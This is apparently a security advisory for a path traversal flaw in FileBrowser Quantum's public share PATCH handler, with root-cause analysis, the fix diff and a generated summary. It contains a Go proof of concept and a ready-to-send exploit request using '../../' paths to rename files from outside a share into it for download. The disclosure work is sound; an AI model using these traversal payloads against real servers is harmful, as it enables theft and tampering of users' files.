FileBrowser Quantum: Path traversal in public share PATCH allows file ops outside shared directory
Description
Summary
publicPatchHandler in backend/http/public.go joins user-controlled fromPath and toPath body fields with the trusted d.share.Path BEFORE the downstream sanitizer runs. Because filepath.Join collapses .. segments during the join, the sanitizer in resourcePatchHandler never sees the traversal and the move/copy/rename operates on a path outside the shared directory. The same root-cause pattern was patched for the bulk DELETE endpoint as CVE-2026-44542 (GHSA-fwj3-42wh-8673), but the PATCH handler with the identical pattern was not updated.
A public share link with AllowModify=true is sufficient to exploit this. Anyone holding such a link can move, copy, or rename arbitrary files within the share owner's source root.
Verified on commit 869b640 (HEAD of main as of 2026-05-07).
Details
In backend/http/public.go the public PATCH handler accepts a JSON body with items[].fromPath and items[].toPath from the client, then prepends the share path before delegating to resourcePatchHandler:
// backend/http/public.go (publicPatchHandler)
for i := range req.Items {
req.Items[i].FromSource = sourceName
req.Items[i].FromPath = utils.JoinPathAsUnix(d.share.Path, req.Items[i].FromPath) // line 372
req.Items[i].ToSource = sourceName
req.Items[i].ToPath = utils.JoinPathAsUnix(d.share.Path, req.Items[i].ToPath) // line 374
}
d.Data = req
status, err := resourcePatchHandler(w, r, d)
utils.JoinPathAsUnix is a thin wrapper around filepath.Join, which calls filepath.Clean and resolves .. segments. By the time the joined path reaches resourcePatchHandler, every .. from the body has been collapsed:
// backend/http/resource.go (resourcePatchHandler)
cleanFromPath, err := utils.SanitizeUserPath(item.FromPath) // line 794
// ...
cleanToPath, err := utils.SanitizeUserPath(item.ToPath) // line 800
SanitizeUserPath (in backend/common/utils/file.go) checks for .. segments after filepath.Clean. Since the join already cleaned the path, no .. segment remains, the sanitizer returns success, and the move/copy/rename proceeds on the escaped target.
The share owner's user is substituted as the acting user for permission checks (d.user = shareCreatedByUser), so the access-control layer treats the request as if the share owner performed it. In a default configuration with no explicit access rules and DenyByDefault=false, Access.Permitted returns true for any path within the source, and the only remaining boundary is the source root itself (idx.Path in Index.GetRealPath).
The fix that landed for CVE-2026-44542 / GHSA-fwj3-42wh-8673 moved the sanitizer before the join in resourceBulkDeleteHandler (backend/http/resource.go:274) and in withHashFileHelper (backend/http/middleware.go:57). The PATCH variant in public.go follows the opposite order (join first, sanitize later) and was not updated.
For comparison, the same file's publicPutHandler uses the safe order:
// backend/http/public.go (publicPutHandler) -- safe order
cleanPath, err := utils.SanitizeUserPath(path) // sanitize FIRST
if err != nil { return http.StatusBadRequest, err }
resolvedPath := utils.JoinPathAsUnix(d.share.Path, cleanPath) // then join
PoC
The bug reproduces deterministically with the project's own helpers, without needing the full server. The Go program below uses verbatim copies of SanitizeUserPath (from backend/common/utils/file.go) and JoinPathAsUnix (from backend/common/utils/main.go) and replays the exact sequence executed for one item in publicPatchHandler followed by resourcePatchHandler.
package main
import (
"fmt"
"path/filepath"
"runtime"
"strings"
)
// Verbatim from backend/common/utils/file.go
func SanitizeUserPath(userPath string) (string, error) {
clean := filepath.Clean(userPath)
for _, segment := range strings.Split(clean, string(filepath.Separator)) {
if segment == ".." {
return "", fmt.Errorf("invalid path: path traversal detected")
}
}
if clean == "." {
return "", fmt.Errorf("invalid path: path must standard index path")
}
return clean, nil
}
// Verbatim from backend/common/utils/main.go
func JoinPathAsUnix(parts ...string) string {
p := filepath.Join(parts...)
if runtime.GOOS == "windows" {
p = strings.ReplaceAll(p, "\\", "/")
}
return p
}
func main() {
sharePath := "/users/alice/shared/" // d.share.Path (server-controlled)
attackerInput := "../../bob/secret.txt"
// publicPatchHandler line 372: join BEFORE sanitize
joined := JoinPathAsUnix(sharePath, attackerInput)
// resourcePatchHandler line 794: sanitize the already-joined path
sanitized, err := SanitizeUserPath(joined)
fmt.Printf("attacker input: %q\n", attackerInput)
fmt.Printf("after join: %q\n", joined)
fmt.Printf("sanitizer err: %v\n", err)
fmt.Printf("sanitized path: %q\n", sanitized)
}
Output:
attacker input: "../../bob/secret.txt"
after join: "/users/bob/secret.txt"
sanitizer err:
sanitized path: "/users/bob/secret.txt"
The path /users/bob/secret.txt is outside the share root /users/alice/shared/ and is the value passed to Index.GetRealPath which resolves to /users/bob/secret.txt. The downstream move/copy/rename then targets that file. The same input is rejected by SanitizeUserPath if the order is reversed (sanitize-then-join), which is the order used by publicPutHandler and the post-fix bulk DELETE.
End-to-end exploit request shape:
PATCH /public/api/resources?hash= HTTP/1.1
Content-Type: application/json
{
"action": "rename",
"items": [
{
"fromSource": "default",
"fromPath": "../../bob/secret.txt",
"toSource": "default",
"toPath": "stolen.txt"
}
]
}
After the request, stolen.txt exists inside the shared directory and is downloadable through the same public share, exfiltrating the file that was outside the share's intended scope.
Impact
An unauthenticated attacker who possesses a public share link with AllowModify=true can move, copy, or rename any file inside the share owner's source root, escaping the share's intended directory. Two practical exploitation patterns:
- Read arbitrary files in the source root: rename a file from outside the shared directory to a location inside it, then download it through the share. This breaks confidentiality of any file the share owner can read.
- Tamper with arbitrary files in the source root: move an attacker-controlled file (uploaded into the share) over the top of a victim file. This breaks integrity of files the share owner can write to (configuration files, dotfiles, web roots if the source includes them).
Scope is bounded by the source root rather than the shared directory, which is the same boundary class as CVE-2026-44542 (GHSA-fwj3-42wh-8673, CVSS 9.1). The remediation pattern is the same: sanitize first, then join. The fix is a one-spot change in publicPatchHandler to call SanitizeUserPath on req.Items[i].FromPath and req.Items[i].ToPath before the two JoinPathAsUnix(d.share.Path, ...) calls.
Affected products
1- Range: < 0.0.0-20260518193514-28e9b81e438e
Patches
128e9b81e438ePublic patch transversal fix (#2444)
4 files changed · +35 −12
backend/common/settings/generator.go+9 −9 modified@@ -286,7 +286,7 @@ func buildPathMapRecursive(structType reflect.Type, structValue reflect.Value, c fieldType := field.Type // Handle pointers - if fieldType.Kind() == reflect.Ptr { + if fieldType.Kind() == reflect.Pointer { if fieldValue.IsNil() { // Skip nil pointers continue @@ -516,7 +516,7 @@ func BuildNode(v reflect.Value, comm CommentsMap) (*yaml.Node, error) { // buildNodeWithDefaults constructs a yaml.Node for any Go value, skipping fields that match defaults, redacting secrets, and filtering deprecated fields func buildNodeWithDefaults(v reflect.Value, comm CommentsMap, defaults reflect.Value, secrets SecretFieldsMap, deprecated DeprecatedFieldsMap) (*yaml.Node, error) { // Dereference pointers - if v.Kind() == reflect.Ptr { + if v.Kind() == reflect.Pointer { if v.IsNil() { return &yaml.Node{Kind: yaml.ScalarNode, Tag: "!!null", Value: "null"}, nil } @@ -790,7 +790,7 @@ func buildNodeWithDefaults(v reflect.Value, comm CommentsMap, defaults reflect.V elemType := v.Type().Elem() // Check if element is a struct or pointer to struct isStructSlice := elemType.Kind() == reflect.Struct || - (elemType.Kind() == reflect.Ptr && elemType.Elem().Kind() == reflect.Struct) + (elemType.Kind() == reflect.Pointer && elemType.Elem().Kind() == reflect.Struct) if !isStructSlice { seq.Style = yaml.FlowStyle } @@ -995,7 +995,7 @@ func GenerateConfigYamlWithEmbedded(config *Settings, showComments bool, showFul // identifySecretFieldsByReflection identifies secret fields by known field names func identifySecretFieldsByReflection(v reflect.Value, typeName string, secrets SecretFieldsMap) { - if v.Kind() == reflect.Ptr { + if v.Kind() == reflect.Pointer { if v.IsNil() { return } @@ -1030,9 +1030,9 @@ func identifySecretFieldsByReflection(v reflect.Value, typeName string, secrets // Recursively check nested structs fieldValue := v.Field(i) - if fieldValue.Kind() == reflect.Struct || (fieldValue.Kind() == reflect.Ptr && !fieldValue.IsNil() && fieldValue.Elem().Kind() == reflect.Struct) { + if fieldValue.Kind() == reflect.Struct || (fieldValue.Kind() == reflect.Pointer && !fieldValue.IsNil() && fieldValue.Elem().Kind() == reflect.Struct) { nestedTypeName := field.Type.Name() - if field.Type.Kind() == reflect.Ptr { + if field.Type.Kind() == reflect.Pointer { nestedTypeName = field.Type.Elem().Name() } identifySecretFieldsByReflection(fieldValue, nestedTypeName, secrets) @@ -1042,7 +1042,7 @@ func identifySecretFieldsByReflection(v reflect.Value, typeName string, secrets // identifyDeprecatedFieldsByReflection identifies deprecated fields by known field names func identifyDeprecatedFieldsByReflection(v reflect.Value, typeName string, deprecated DeprecatedFieldsMap) { - if v.Kind() == reflect.Ptr { + if v.Kind() == reflect.Pointer { if v.IsNil() { return } @@ -1072,9 +1072,9 @@ func identifyDeprecatedFieldsByReflection(v reflect.Value, typeName string, depr // Recursively check nested structs fieldValue := v.Field(i) - if fieldValue.Kind() == reflect.Struct || (fieldValue.Kind() == reflect.Ptr && !fieldValue.IsNil() && fieldValue.Elem().Kind() == reflect.Struct) { + if fieldValue.Kind() == reflect.Struct || (fieldValue.Kind() == reflect.Pointer && !fieldValue.IsNil() && fieldValue.Elem().Kind() == reflect.Struct) { nestedTypeName := field.Type.Name() - if field.Type.Kind() == reflect.Ptr { + if field.Type.Kind() == reflect.Pointer { nestedTypeName = field.Type.Elem().Name() } identifyDeprecatedFieldsByReflection(fieldValue, nestedTypeName, deprecated)
backend/http/public.go+11 −2 modified@@ -368,10 +368,19 @@ func publicPatchHandler(w http.ResponseWriter, r *http.Request, d *requestContex // Note: Share paths are absolute, so we don't strip user scope here // resourcePatchHandler will skip adding scope for shares for i := range req.Items { + var sanitizedPath string + sanitizedPath, err = utils.SanitizeUserPath(req.Items[i].FromPath) + if err != nil { + return http.StatusBadRequest, fmt.Errorf("invalid from path: %w", err) + } req.Items[i].FromSource = sourceName - req.Items[i].FromPath = utils.JoinPathAsUnix(d.share.Path, req.Items[i].FromPath) + req.Items[i].FromPath = utils.JoinPathAsUnix(d.share.Path, sanitizedPath) + sanitizedPath, err = utils.SanitizeUserPath(req.Items[i].ToPath) + if err != nil { + return http.StatusBadRequest, fmt.Errorf("invalid to path: %w", err) + } req.Items[i].ToSource = sourceName - req.Items[i].ToPath = utils.JoinPathAsUnix(d.share.Path, req.Items[i].ToPath) + req.Items[i].ToPath = utils.JoinPathAsUnix(d.share.Path, sanitizedPath) } d.Data = req
backend/http/share.go+7 −1 modified@@ -206,6 +206,12 @@ func sharePatchHandler(w http.ResponseWriter, r *http.Request, d *requestContext return http.StatusBadRequest, fmt.Errorf("hash and path are required") } + sanitizedPath, err := utils.SanitizeUserPath(body.Path) + if err != nil { + return http.StatusBadRequest, fmt.Errorf("invalid path: %w", err) + } + body.Path = sanitizedPath + // only allow users to update their own shares thisShare, err := store.Share.GetByHash(body.Hash) if err != nil { @@ -215,7 +221,7 @@ func sharePatchHandler(w http.ResponseWriter, r *http.Request, d *requestContext return http.StatusForbidden, fmt.Errorf("you are not allowed to update this share") } // Update the share path - err = store.Share.UpdateSharePath(body.Hash, body.Path) + err = store.Share.UpdateSharePath(body.Hash, sanitizedPath) if err != nil { return http.StatusInternalServerError, err }
CHANGELOG.md+8 −0 modified@@ -2,6 +2,14 @@ All notable changes to this project will be documented in this file. For commit guidelines, please refer to [Standard Version](https://github.com/conventional-changelog/standard-version). +## v1.3.3-stable + + **Security**: + - [Critical] Path traversal in public share PATCH allows file ops outside shared directory -- thanks @fg0x0 and @Revanth011 for reporting GHSA-qqqm-5547-774 + + **Notes**: + - updated share hash middleware (#2443) + ## v1.3.9 **Security**:
Vulnerability mechanics
Root cause
"The `publicPatchHandler` joins user-controlled path segments with the share path before sanitization, allowing path traversal."
Attack vector
An attacker must possess a public share link with `AllowModify=true` [ref_id=1]. The attacker sends a PATCH request to the public API endpoint containing a JSON body with `items[].fromPath` and `items[].toPath` fields. These fields are crafted with `..` segments to escape the intended shared directory. The server then processes these paths, allowing arbitrary file operations within the share owner's source root [ref_id=1].
Affected code
The vulnerability exists in `backend/http/public.go` within the `publicPatchHandler` function, specifically at lines 372 and 374 where `utils.JoinPathAsUnix` is called before sanitization [ref_id=1]. The `resourcePatchHandler` function in `backend/http/resource.go` is where the sanitized paths are processed, but by then the traversal has already occurred [ref_id=1].
What the fix does
The fix involves modifying the `publicPatchHandler` to sanitize the `req.Items[i].FromPath` and `req.Items[i].ToPath` fields using `SanitizeUserPath` *before* joining them with `d.share.Path` [ref_id=1]. This ensures that any path traversal attempts are detected and rejected early in the request processing pipeline, preventing operations on files outside the intended directory.
Preconditions
- authAttacker must possess a public share link with `AllowModify=true`.
Reproduction
```go package main
import ( "fmt" "path/filepath" "runtime" "strings" )
// Verbatim from backend/common/utils/file.go func SanitizeUserPath(userPath string) (string, error) { clean := filepath.Clean(userPath) for _, segment := range strings.Split(clean, string(filepath.Separator)) { if segment == ".." { return "", fmt.Errorf("invalid path: path traversal detected") } } if clean == "." { return "", fmt.Errorf("invalid path: path must standard index path") } return clean, nil }
// Verbatim from backend/common/utils/main.go func JoinPathAsUnix(parts ...string) string { p := filepath.Join(parts...) if runtime.GOOS == "windows" { p = strings.ReplaceAll(p, \"\\\", "/") } return p }
func main() { sharePath := "/users/alice/shared/" // d.share.Path (server-controlled) attackerInput := "../../bob/secret.txt"
// publicPatchHandler line 372: join BEFORE sanitize joined := JoinPathAsUnix(sharePath, attackerInput)
// resourcePatchHandler line 794: sanitize the already-joined path sanitized, err := SanitizeUserPath(joined)
fmt.Printf("attacker input: %q\n", attackerInput) fmt.Printf("after join: %q\n", joined) fmt.Printf("sanitizer err: %v\n", err) fmt.Printf("sanitized path: %q\n", sanitized) } ``` Output: ``` attacker input: "../../bob/secret.txt" after join: "/users/bob/secret.txt" sanitizer err: <nil> sanitized path: "/users/bob/secret.txt" ```
Generated on Jun 8, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
2News mentions
0No linked articles in our index yet.